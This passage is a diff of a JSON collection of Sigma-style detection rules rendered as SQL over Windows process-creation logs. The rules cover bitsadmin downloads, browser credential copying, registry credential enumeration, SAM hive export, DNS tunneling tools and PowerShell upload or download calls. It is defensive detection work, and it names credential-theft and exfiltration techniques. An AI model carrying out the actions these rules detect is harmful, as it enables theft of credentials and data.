"5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level", - "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "title": "Always Install Elevated Windows Installer", + "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "status": "experimental", - "description": "Detects use of executionpolicy option to set insecure policies", - "author": "frack113", + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator script" + "System administrator usage", + "Anti virus products", + "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%msi%' ESCAPE '\\' AND NewProcessName LIKE '%tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" + "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" }, { - "title": "Suspicious ConfigSecurityPolicy Execution", - "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "title": "Potential Remote Desktop Tunneling", + "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", "status": "experimental", - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "author": "frack113", + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" + "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" }, { - "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "id": "02b18447-ea83-4b1b-8805-714a8a34546a", - "status": "test", - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "author": "frack113", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "status": "experimental", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Browser Data Stealing", + "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "status": "experimental", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_susp_copy_browser_data.yml" }, { - "title": "Dism Remove Online Package", - "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "title": "Enumeration for 3rd Party Creds From CLI", + "id": "87a476dc-0079-4583-a985-dee7a20a03de", "status": "experimental", - "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "author": "frack113", + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsim_remove.yml" + "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Service StartupType Change Via Sc.EXE", + "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "False positives may occur with troubleshooting scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_sc_disable_service.yml" }, { - "title": "Suspicious Cmdl32 Execution", - "id": "f37aba28-a9e6-4045-882c-d5004043b337", - "status": "experimental", - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "author": "frack113", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cmdl32.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "Suspicious CMD Shell Output Redirect", - "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "title": "Gzip Archive Decode Via PowerShell", + "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", "status": "experimental", - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1218" - ], + "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", + "author": "Hieu Tran", "falsepositives": [ - "Legitimate admin scripts" + "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + "filename": "proc_creation_win_powershell_decode_gzip.yml" }, { - "title": "Potential Commandline Obfuscation Using Escape Characters", - "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", - "status": "test", - "description": "Detects potential commandline obfuscation using known escape characters", - "author": "juju4", + "title": "Use of Scriptrunner.exe", + "id": "64760eef-87f7-4ed3-93fd-655668ea9420", + "status": "experimental", + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use when App-v is deployed" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" + "filename": "proc_creation_win_lolbin_scriptrunner.yml" }, { "title": "Use Short Name Path in Image", @@ -12342,1263 +12237,1205 @@ "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" }, { - "title": "Potential Remote Desktop Tunneling", - "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", - "status": "experimental", - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "author": "Tim Rauch", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" - }, - { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious Msiexec Quiet Install From Remote Location", - "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "title": "Suspicious WindowsTerminal Child Processes", + "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "status": "experimental", - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "Other legitimate \"Windows Terminal\" profiles" ], "level": "medium", - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE 